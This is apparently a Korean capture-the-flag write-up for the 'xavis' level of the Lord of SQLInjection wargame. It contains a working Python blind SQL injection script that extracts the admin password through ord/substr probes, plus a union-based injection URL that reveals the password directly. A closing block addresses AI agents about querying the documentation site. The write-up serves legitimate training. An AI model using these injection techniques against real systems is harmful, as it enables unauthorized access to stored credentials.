# xavis

첫 화면이다.

![](/files/-M-9337ftDMtZuIJWt7o)

아래와 같이 쿼리를 보내 문자 하나의 길이가 4 임을 알 수 있다.

![](/files/-M-97KsXPfDoCmGcqlEh)

이를 참고해 파이썬 코드를 짜면 아래와 같다.

`ascii()`  대신 `ord()` 를 사용했고, `character` 의 범위가 `range(0, 128)` 이 아닌 `range(0, 65536)` 이다.

```python
import requests

URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello admin'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 12
def find_pw_length():
    pw_len = 1
    while query("' or id='admin' and length(pw)={}%23".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# 4
def find_character_size():
    character_size = 1
    while query("' or id='admin' and length(substr(pw,1,1))={}%23".format(character_size)) is False:
        character_size += 1
    print('character_size: {}'.format(character_size))
    return character_size


# 우왕굳
def find_pw():
    pw_len = find_pw_length()
    character_size = find_character_size()
    pw = ''
    for pos in range(1, pw_len // character_size + 1):
        for character in range(0, 65536):
            if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

실행결과, pw는 `우왕굳` 이다.

[https://los.rubiya.kr/chall/xavis\_04f071ecdadb4296361d2101e4a2c390.php?pw=우왕굳](https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%EC%9A%B0%EC%99%95%EA%B5%B3) 에 접속하면 문제가 풀린다.

![](/files/-M-CuIqjyLLaWOo0l65t)

또 다른 풀이가 있다.

<https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%27%20or%20(select%20@a:=pw%20where%20id=%27admin%27)%20union%20select%20@a%23> 에 접속하면 아래와 같이 pw를 바로 볼 수 있다.

![](/files/-M-CuThCnCw5YLkFzPDw)

pw에 `' or (select @a:=pw where id='admin') union select @a#` 을 넣은 셈이다.

`select @a:=pw where id='admin'` 이라는 쿼리 자체는 false를 반환하므로 뒤에 `union` 을 사용해 `@a` 값을 가져오도록 하였다.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/xavis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.